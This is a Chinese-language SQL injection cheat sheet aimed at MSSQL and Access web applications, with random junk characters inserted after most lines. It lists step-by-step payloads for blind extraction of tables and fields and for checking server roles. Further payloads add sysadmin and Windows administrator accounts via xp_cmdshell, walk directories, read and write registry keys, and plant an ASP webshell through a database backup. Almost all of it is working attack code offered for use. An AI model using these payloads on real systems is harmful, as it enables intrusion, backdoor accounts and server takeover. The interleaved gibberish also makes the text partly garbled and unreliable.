1.判断是否有注入;and 1=1 ;and 1=2 d,%e?8x5
2.初步判断是否是mssql ;and user>0 R'Gka1v
ub/Z'!
3.注入参数是字符'and [查询条件] and ''=' &Tc:WD
oe (})M
4.搜索时没过滤参数的'and [查询条件] and '%25'=' +/"Ws'5E
vR`#kxSdJ@
5.判断数据库系统 nK!yu?mS
dUt$kB
;and (select count(*) from sysobjects)>0 mssql J \06j%d,
V(gmC%6%l*
;and (select count(*) from msysobjects)>0 access qS8p )pw
c<k=8P
""~b1kEt
ON,sN
6.猜数据库 ;and (select Count(*) from [数据库名])>0 vJ
+sdG
!O*'mX
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 g?7I7W~?`
TTYM!+T
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 7lLh4__;`6
c[IT?6J4
9.(1)猜字段的ascii值(access) kT-dQ32
FRBW(vKE
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 `7D]J*?`
Ru&>8Ln0
(2)猜字段的ascii值(mssql) Pv#Oea?
"V=IG{.
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 {/)q=
*\-$.w)k
10.测试权限结构(mssql) thU9s%,
'VMov
m}-*B1
f]_{4Olk
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- h]+UK14m
]\JLlQ}#H
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- "^froQ{"T
$q|-9B
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- )X2/_3
+nIjW;RU
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ?5IF;vk
,<CFjtelO
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- {`ghX%M(l
UR|Au'iu
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- mf W}^mu
XsEotW
;and 1=(select IS_MEMBER('db_owner'));-- '=WPi_Z5:C
ke)}JU^"
6"L,#aKm^
hNRN`\5Z
11.添加mssql和系统的帐户 5(\H:g\z
5r` x\
;exec master.dbo.sp_addlogin username;-- v[2N-
;exec master.dbo.sp_password null,username,password;-- ~Fe$/*v
?onEqH>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- FX
%(<M
c;B: o
;exec master.dbo.xp_cmdshell 'net user username password \zT{zO&!
!{+a2wi
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 9*2Q'z}_
K%g_e*"$
;exec master.dbo.xp_cmdshell 'net user username password /add';-- W9G1wU
6QYHPz
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- b{Bef*`/
pSl4^$2XR
RxA:>yOPn
v8y !zo'
12.(1)遍历目录 d6XdN
[OYSNAs*y
;create table dirs(paths varchar(100), id int) =.]{OT
ET[>kn^#
;insert dirs exec master.dbo.xp_dirtree 'c:\' 3(,c^F
>H,5MM!
;and (select top 1 paths from dirs)>0 A
D%9;KQ8
[85b+SKW
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) bcYGkvGbO
:I2spBx
iLO,XW?d
v
O&
1z-
(2)遍历目录 }1mkX\wWP
4jw q$G
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ^8=e8O
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 8K9RA<
E^B3MyS^^
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 @ek8t2??x
G2dPm}s ZG
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 pD]2.O
XG!^[ZDs
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 zgl$ n
]zz%gZz
KP_7h/e
&],O\TAul
13.mssql中的存储过程
N8)]d
7|k2~\@q
xp_regenumvalues 注册表根键, 子键 E
<N%
+bk+0k9k5
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 W/.n
R[!
kbSl.V%)
xp_regread 根键,子键,键值名 ~xJ^YkyH
5R6QZVc
;exec xp_regread bsc#Oq]
qga\icQr
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 44pVZ5c
D7Y?$=0ycb
xp_regwrite 根键,子键, 值名, 值类型, 值 p\}!uS4 (
ab[V->>%
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 p.5 *`, )
CdKs+x&tZ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 zVis"g`
m4^VlE,`Dh
xp_regdeletevalue 根键,子键,值名 bYYjP.rcF
@h\i<sh!^
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 gX(8V*os^
jX,A.
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 GL^
j
|1
fVYv 2
*-'`Ea
/U>8vV+C
14.mssql的backup创建webshell nyZ?m
u1|v3/Q-
use model d>/4z#R}-
PPh1y;D
create table cmd(str image); )O\l3h"
xOZvQ\%
insert into cmd(str) values (''); &<) _7?
)+.AgqxI
backup database model to disk='c:\l.asp'; V /)3d
(A;HB@)[A
\\/
!I
?[
D6|gp
15.mssql内置函数 ZRUA w,T *
_X)]/A%@
;and (select @@version)>0 获得Windows的版本号 fVq,?
ktv{-WG2_
;and user_name()='dbo' 判断当前系统的连接用户是不是sa r?x~`C
`U;V-
;and (select user_name())>0 爆当前系统的连接用户 obw:@i#
5hB2:$C
;and (select db_name())>0 得到当前连接的数据库 ~5Rh7
x_EU.924uY
UL" <V
6uFGq)4p@
16.简洁的webshell hflDVGBW
lqKwjJtX
use model h#8{fr)6
uMBb=
create table cmd(str image); :Czvwp{z
:wJ!rn,4
insert into cmd(str) values (''); )sapUnqrlR
16I(S
backup database model to disk='g:\wwwtest\l.asp';